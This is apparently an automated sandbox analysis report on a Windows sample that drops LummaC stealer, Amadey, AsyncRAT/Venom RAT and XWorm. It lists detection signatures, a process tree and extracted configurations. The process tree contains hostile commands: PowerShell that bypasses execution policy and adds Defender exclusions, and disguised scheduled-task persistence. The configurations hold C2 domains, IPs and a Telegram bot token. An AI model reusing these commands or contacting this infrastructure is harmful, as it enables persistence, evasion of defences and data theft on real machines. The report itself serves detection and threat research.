Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1579159
MD5:	c9624e4e0c6bbc83b57f844d1dc44102
SHA1:	b0f8c247986305f8f1f83ea55bb04f6c748557ce
SHA256:	a7a661cf43d7129a809901c641998089aff10f97a09bbdf5874ba16c01db5dfb
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected LummaC Stealer

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Drops large PE files

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides threads from debuggers

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Uses cmd line tools excessively to alter registry or file data

Uses ping.exe to check the status of other devices and networks

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C9624E4E0C6BBC83B57F844D1DC44102)

skotes.exe (PID: 6200 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: C9624E4E0C6BBC83B57F844D1DC44102)

skotes.exe (PID: 1592 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: C9624E4E0C6BBC83B57F844D1DC44102)

2gwmtZs.exe (PID: 5208 cmdline: "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe" MD5: F16E098C7EFAD8AB0B6E62C428E7E649)

WerFault.exe (PID: 4952 cmdline: C:\Windows\system32\WerFault.exe -u -p 5208 -s 784 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

RzAAR0y.exe (PID: 6860 cmdline: "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe" MD5: A732362B415CD62F07D30DB89E742C85)

28d287a54d.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 6556 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)

7z.exe (PID: 3160 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 1464 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 7144 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 4512 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 5724 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6528 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 2396 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 3208 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

attrib.exe (PID: 5960 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

in.exe (PID: 1540 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)

attrib.exe (PID: 6696 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 3048 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6964 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6088 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 6808 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

vQeyqr1.exe (PID: 6500 cmdline: "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe" MD5: 07E410214A2AEB8F577E407154252F3C)

powershell.exe (PID: 2644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

0064eff6c8.exe (PID: 2324 cmdline: "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe" MD5: 8EB4F92605E35C57A42B0917C221D65C)

cmd.exe (PID: 528 cmdline: "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6748 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6556 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

22b0b7688f.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe" MD5: 0121D24D5F6392439A1D49C2904595E1)

950932ab59.exe (PID: 424 cmdline: "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe" MD5: 27C1F96D7E1B72B6817B6EFEFF037F90)

Intel_PTT_EK_Recertification.exe (PID: 1924 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: LummaC

{"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "aspecteirs.lat", "discokeyus.lat", "necklacebudi.lat", "energyaffai.lat", "rapeflowwj.lat", "grannyejh.lat"], "Build id": "PvbArZ--"}

Threatname: Xworm

{"C2 url": ["45.200.149.15"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8174428401:AAHxlGtOg4tsy0J0kYm7h8822BuHfnk8vKQ/sendMessage"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: AsyncRAT

{"Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Mutex": "hgzuiajogwnqs", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kFccRRCzW3jG/otfy1Jkj43o0+4OxnCs1oCpmxYTk3m7JpGlsS6RGQjGzdX6D5uOIuCbvZ6LcErP2gcbdu30OOKRo2h1VjJW/J05YD4xFgwBHdMxA1DXT6Q4kwhO3cK5KTA9hcSqIF+Z0LOI9nl3fyGZmlcmxLX5iHGRq64bny8=", "External_config_on_Pastebin": "https://pastebin.com/raw/dDuwSpUA"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10a57:$s6: VirtualBox 0x109b5:$s8: Win32_ComputerSystem 0x138d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1396d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13a82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11feb:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10a57:$s6: VirtualBox 0x109b5:$s8: Win32_ComputerSystem 0x138d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1396d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13a82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11feb:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10a57:$s6: VirtualBox 0x109b5:$s8: Win32_ComputerSystem
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6aea:$cnc4: POST / HTTP/1.1
0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf8b4:$q1: Select * from Win32_CacheMemory 0xf8f4:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf942:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf990:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x509d:$s6: Set-MpPreference -MAPSReporting 0 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x5422:$e2: Add-MpPreference -ExclusionPath
00000001.00000003.2154211467.00000000054D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10a57:$s6: VirtualBox 0x109b5:$s8: Win32_ComputerSystem 0x138d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1396d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13a82:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11feb:$cnc4: POST / HTTP/1.1
00000009.00000003.2589474879.0000000005250000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.4661857196.000000000303D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.4675040044.000001AC39141000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10857:$s6: VirtualBox 0x107b5:$s8: Win32_ComputerSystem 0x136d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1376d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13882:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11deb:$cnc4: POST / HTTP/1.1
00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.2182621065.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000002.4639753741.000001AC373B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x22148:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x256de:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RzAAR0y.exe PID: 6860	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: vQeyqr1.exe PID: 6500	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: vQeyqr1.exe PID: 6500	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vQeyqr1.exe PID: 6500	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.RzAAR0y.exe.1ac390b0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.RzAAR0y.exe.1ac390b0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x502a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cea:$cnc4: POST / HTTP/1.1
11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6aea:$cnc4: POST / HTTP/1.1
14.2.vQeyqr1.exe.1e610000.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
